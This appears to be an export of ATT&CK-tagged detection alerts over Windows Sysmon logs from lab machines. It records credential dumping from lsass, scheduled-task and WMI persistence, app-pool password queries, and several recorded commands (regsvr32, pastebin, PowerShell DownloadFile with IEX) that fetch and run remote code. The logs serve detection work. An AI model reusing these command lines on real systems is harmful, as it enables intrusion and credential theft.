4012
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-7B40-5CEC-0000-0020E7030000
0x3e7
0
System
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-FD85-5CEB-0000-00104C0E0B00
1944
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Credential Dumping - Process Access,1552849805.303341,2019-03-17T23:10:05.303341+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10,"
10
3
4
10
0
0x8000000000000000
4442
Microsoft-Windows-Sysmon/Operational
PC04.example.corp
2019-03-17 19:10:02.068
365ABB72-9B85-5C8E-0000-0010C4CC1200
3576
3620
C:\Windows\system32\taskmgr.exe
365ABB72-0886-5C8F-0000-001030560000
476
C:\Windows\system32\lsass.exe
0x1fffff
C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\SYSTEM32\ntdll.dll+1d4da|C:\Windows\system32\kernel32.dll+3cc47|C:\Windows\system32\kernel32.dll+3ff99|C:\Windows\system32\dbghelp.dll+4c791|C:\Windows\system32\dbghelp.dll+4dcab|C:\Windows\system32\dbghelp.dll+4a1b8|C:\Windows\system32\dbghelp.dll+45b81|C:\Windows\system32\dbghelp.dll+45e2a|C:\Windows\system32\taskmgr.exe+1360e|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d
",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557686932.766629,2019-05-12T22:48:52.766629+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
16840
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 18:48:52.344
365ABB72-6A94-5CD8-0000-0010C2F10E00
3880
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\cmd.exe"
c:\ProgramData\
IEWIN7\IEUser
365ABB72-695E-5CD8-0000-002015370100
0x13715
1
Medium
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-6A94-5CD8-0000-00101BDB0E00
1340
C:\ProgramData\jabber.exe
jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.971708,2019-05-27T05:29:17.971708+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.username ),1,"
1
5
4
1
0
0x8000000000000000
5907
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:17.931
365ABB72-3D6D-5CEB-0000-00108C7FFF00
3196
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.username
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1555606584.893827,2019-04-18T20:56:24.893827+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( Powershell ),1,"
1
5
4
1
0
0x8000000000000000
13
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1086,technique_name=PowerShell
2019-04-18 16:56:08.340
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
Powershell
C:\Users\IEUser\Desktop\
IEWIN7\IEUser
365ABB72-AB27-5CB8-0000-002021CA0000
0xca21
1
High
SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
365ABB72-AC01-5CB8-0000-0010BB7E0700
1196
C:\Windows\System32\cmd.exe
"cmd.exe" /s /k pushd "C:\Users\IEUser\Desktop"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll)",1,"
1
5
4
1
0
0x8000000000000000
18851
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-18 17:51:14.254
365ABB72-4612-5CE0-0000-00103D1E2600
2600
C:\Windows\System32\regsvr32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll
C:\Windows\system32\
IEWIN7\IEUser
365ABB72-433D-5CE0-0000-002031350100
0x13531
1
Medium
SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583
365ABB72-433C-5CE0-0000-00100FD20000
964
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1,"
1
5
4
1
0
0x8000000000000000
18851
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-18 17:51:14.254
365ABB72-4612-5CE0-0000-00103D1E2600
2600
C:\Windows\System32\regsvr32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll
C:\Windows\system32\
IEWIN7\IEUser
365ABB72-433D-5CE0-0000-002031350100
0x13531
1
Medium
SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583
365ABB72-433C-5CE0-0000-00100FD20000
964
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1,"
1
5
4
1
0
0x8000000000000000
18851
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-18 17:51:14.254
365ABB72-4612-5CE0-0000-00103D1E2600
2600
C:\Windows\System32\regsvr32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll
C:\Windows\system32\
IEWIN7\IEUser
365ABB72-433D-5CE0-0000-002031350100
0x13531
1
Medium
SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583
365ABB72-433C-5CE0-0000-00100FD20000
964
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.891593,2019-05-27T05:29:17.891593+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1,"
1
5
4
1
0
0x8000000000000000
5904
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:17.851
365ABB72-3D6D-5CEB-0000-0010C47BFF00
560
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969979.519768,2019-05-27T19:12:59.519768+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe ) through command line ( \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"
1
5
4
1
0
0x8000000000000000
6192
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 15:12:54.612
365ABB72-FE76-5CEB-0000-001015780C00
1260
\Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe
?
?
?
?
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-7B40-5CEC-0000-0020E7030000
0x3e7
0
System
SHA1=D2A54176D8E86788FB6D588919031FEF7594A79C,MD5=5779C26E8F7B3E2C9354436E0081DF67,SHA256=64F02345E342749D381F7DF34E23CE304B3292F97DE9ECE0FB6E9B55466ADF44,IMPHASH=481F47BBB2C9C21E108D65F52B04C448
365ABB72-FE6C-5CEB-0000-00104A170C00
3680
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1558969979.519768,2019-05-27T19:12:59.519768+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe ) through command line ( \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"
1
5
4
1
0
0x8000000000000000
6192
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 15:12:54.612
365ABB72-FE76-5CEB-0000-001015780C00
1260
\Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe
?
?
?
?
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-7B40-5CEC-0000-0020E7030000
0x3e7
0
System
SHA1=D2A54176D8E86788FB6D588919031FEF7594A79C,MD5=5779C26E8F7B3E2C9354436E0081DF67,SHA256=64F02345E342749D381F7DF34E23CE304B3292F97DE9ECE0FB6E9B55466ADF44,IMPHASH=481F47BBB2C9C21E108D65F52B04C448
365ABB72-FE6C-5CEB-0000-00104A170C00
3680
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Medium,Found User (IEWIN7\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried indirect command execution through commandline ( "C:\Windows\system32\calc.exe" ),1,"
1
5
4
1
0
0x8000000000000000
16498
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 17:01:50.852
365ABB72-517E-5CD8-0000-00105FE01700
2920
C:\Windows\System32\calc.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows Calculator
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\calc.exe"
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-4FB5-5CD8-0000-0020F2350100
0x135f2
1
Medium
SHA1=9018A7D6CDBE859A430E8794E73381F77C840BE0,MD5=60B7C0FEAD45F2066E5B805A91F4F0FC,SHA256=80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22,IMPHASH=F93B5D76132F6E6068946EC238813CE1
365ABB72-517E-5CD8-0000-001024D61700
2952
C:\Windows\System32\pcalua.exe
"C:\Windows\System32\pcalua.exe" -a c:\Windows\system32\calc.exe
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1218.005 ] Mshta found running in the system,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta") and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta) in directory : ( c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ )",1,"
1
5
4
1
0
0x8000000000000000
16396
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:38:00.592
365ABB72-21B8-5CD8-0000-0010E4E82600
2964
C:\Windows\System32\mshta.exe
11.00.9600.16428 (winblue_gdr.131013-1700)
Microsoft (R) HTML Application host
Internet Explorer
Microsoft Corporation
"C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta"
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-1596-5CD8-0000-0020103A0100
0x13a10
1
High
SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
365ABB72-21B8-5CD8-0000-0010BADE2600
3856
C:\Windows\System32\rundll32.exe
rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta" ) contains suspicious command ( \mshta.exe),1,"
1
5
4
1
0
0x8000000000000000
16396
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:38:00.592
365ABB72-21B8-5CD8-0000-0010E4E82600
2964
C:\Windows\System32\mshta.exe
11.00.9600.16428 (winblue_gdr.131013-1700)
Microsoft (R) HTML Application host
Internet Explorer
Microsoft Corporation
"C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta"
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-1596-5CD8-0000-0020103A0100
0x13a10
1
High
SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
365ABB72-21B8-5CD8-0000-0010BADE2600
3856
C:\Windows\System32\rundll32.exe
rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1170] Detecting Mshta,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta") and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta) in directory : ( c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ )",1,"
1
5
4
1
0
0x8000000000000000
16396
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:38:00.592
365ABB72-21B8-5CD8-0000-0010E4E82600
2964
C:\Windows\System32\mshta.exe
11.00.9600.16428 (winblue_gdr.131013-1700)
Microsoft (R) HTML Application host
Internet Explorer
Microsoft Corporation
"C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta"
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-1596-5CD8-0000-0020103A0100
0x13a10
1
High
SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
365ABB72-21B8-5CD8-0000-0010BADE2600
3856
C:\Windows\System32\rundll32.exe
rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558398907.47416,2019-05-21T04:35:07.474160+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c test.bat ),1,"
1
5
4
1
0
0x8000000000000000
374
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-21 00:35:07.386
365ABB72-47BB-5CE3-0000-001071AD3E00
3944
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\system32\cmd.exe /c test.bat
C:\Users\IEUser\Downloads\
IEWIN7\IEUser
365ABB72-39CC-5CE3-0000-002096C70000
0xc796
1
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-47BB-5CE3-0000-0010BFA83E00
1912
C:\Users\IEUser\Downloads\com-hijack.exe
"C:\Users\IEUser\Downloads\com-hijack.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553028075.154291,2019-03-20T00:41:15.154291+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
1966252
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 20:36:04.226
365ABB72-52B4-5C91-0000-0010D55B0100
1636
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-528D-5C91-0000-0020E7030000
0x3e7
0
System
MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-528D-5C91-0000-001062560000
484
C:\Windows\System32\services.exe
C:\Windows\system32\services.exe
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1003] Credential Dumping - Process Access,1552849783.932612,2019-03-17T23:09:43.932612+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10,"
10
3
4
10
0
0x8000000000000000
4434
Microsoft-Windows-Sysmon/Operational
PC04.example.corp
2019-03-17 19:09:41.328
365ABB72-9B75-5C8E-0000-0010013F1200
1856
980
C:\Users\IEUser\Desktop\procdump.exe
365ABB72-0886-5C8F-0000-001030560000
476
C:\Windows\system32\lsass.exe
0x1fffff
C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\SYSTEM32\ntdll.dll+1d4da|C:\Windows\system32\kernel32.dll+3cc47|C:\Windows\system32\kernel32.dll+3ff99|C:\Windows\system32\dbghelp.dll+4c791|C:\Windows\system32\dbghelp.dll+4dcab|C:\Windows\system32\dbghelp.dll+4a1b8|C:\Windows\system32\dbghelp.dll+45b81|C:\Windows\system32\dbghelp.dll+45e2a|C:\Users\IEUser\Desktop\procdump.exe+11a8d|C:\Users\IEUser\Desktop\procdump.exe+116a6|C:\Users\IEUser\Desktop\procdump.exe+11610|C:\Users\IEUser\Desktop\procdump.exe+11356|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d
",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript runing script,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line ("c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))""") and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine ("C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}) in directory : ( C:\Windows\system32\ )",1,"
1
5
4
1
0
0x8000000000000000
10675
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-14 12:17:14.661
747F3D96-FBCA-5D53-0000-001036784100
2876
C:\Windows\System32\wscript.exe
5.812.10240.16384
Microsoft ® Windows Based Script Host
Microsoft ® Windows Script Host
Microsoft Corporation
"c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))"""
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-F419-5D53-0000-002026910200
0x29126
1
Medium
SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C
747F3D96-FBCA-5D53-0000-0010B8664100
2476
C:\Windows\System32\rundll32.exe
"C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.811477,2019-05-27T05:29:17.811477+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1,"
1
5
4
1
0
0x8000000000000000
5901
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:17.771
365ABB72-3D6D-5CEB-0000-00100478FF00
3444
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969974.632117,2019-05-27T19:12:54.632117+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"
1
5
4
1
0
0x8000000000000000
6190
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 15:12:54.515
365ABB72-FE76-5CEB-0000-001077710C00
2840
C:\Windows\System32\wbem\WMIC.exe
6.1.7600.16385 (win7_rtm.090713-1255)
WMI Commandline Utility
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-7B40-5CEC-0000-0020E7030000
0x3e7
0
System
SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443
365ABB72-FE76-5CEB-0000-0010546E0C00
2356
C:\Windows\System32\cmd.exe
cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (|, -c ,.Download,.DownloadFile(,Net.WebClient,powershell,.txt,|, -c ,.Download,.DownloadFile(,Net.WebClient,powershell,.txt) in event with Command Line (powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))") and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))") in directory : ( C:\Windows\system32\ )",1,"
1
5
4
1
0
0x8000000000000000
4912
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:23.380
747F3D96-6623-5D3F-0000-0010BC068800
3000
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
